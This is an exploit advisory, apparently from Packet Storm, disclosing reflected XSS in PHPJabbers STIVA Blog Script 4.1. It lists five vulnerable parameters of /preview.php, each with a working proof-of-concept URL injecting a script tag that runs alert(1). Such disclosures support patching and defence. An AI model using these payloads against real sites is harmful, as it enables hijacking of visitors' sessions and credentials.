Exploit for PHPJabbers STIVA Blog Script 4.1 Cross Site Scripting

Name: Exploit for PHPJabbers STIVA Blog Script 4.1 Cross Site Scripting
Rating: 5 (123 reviews)
2023-06-23 | CVSS 7.1
## https://sploitus.com/exploit?id=PACKETSTORM:173108
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
││ C r a C k E r ┌┘  
┌┘ T H E C R A C K O F E T E R N A L M I G H T ││  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
  
┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐  
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘ [ Vulnerability ] ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
: Author : CraCkEr :  
│ Website : https://www.phpjabbers.com/stiva-blog-script/ │  
│ Vendor : PHPJabbers │  
│ Software : PHPJabbers STIVA Blog Script 4.1 │  
│ Vuln Type: Reflected XSS │  
│ Impact : Manipulate the content of the site │  
│ │  
│────────────────────────────────────────────────────────────────────────────────────────│  
│ ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
: :  
│ Release Notes: │  
│ ═════════════ │  
│ The attacker can send to victim a link containing a malicious URL in an email or │  
│ instant message can perform a wide variety of actions, such as stealing the victim's │  
│ session token or login credentials │  
│ │  
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘ ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
  
Greets:  
  
The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09   
  
CryptoJob (Twitter) twitter.com/0x0CryptoJob  
  
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘ © CraCkEr 2023 ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
  
  
Path: /preview.php  
  
GET 'category_id' parameter is vulnerable to RXSS  
  
https://website/preview.php?controller=pjLoad&action=pjActionIndex&category_id=5qn281%22%3e%3cscript%3ealert(1)%3c%2fscript%3enjmk9  
  
GET 'lid' parameter is vulnerable to RXSS  
  
https://website/preview.php?lid=umxpr"><script>alert(1)</script>dbyiw&pjPage=2  
  
GET 'archive' parameter is vulnerable to RXSS  
  
https://website/preview.php?controller=pjLoad&action=pjActionIndex&dosearch=1&category_id=&archive=b5bzk%22%3e%3cscript%3ealert(1)%3c%2fscript%3em9gtp&keyword=123  
  
GET 'keyword' parameter is vulnerable to RXSS  
  
https://website/preview.php?controller=pjLoad&action=pjActionIndex&dosearch=1&category_id=&archive=&keyword=123fcgbt%22%3e%3cscript%3ealert(1)%3c%2fscript%3eya0py  
  
URL parameter is vulnerable to RXSS  
  
https://website/preview.php/f76te"><script>alert(1)</script>cq8x2?controller=pjLoad&action=pjActionIndex&category_id=5  
  
  
[-] Done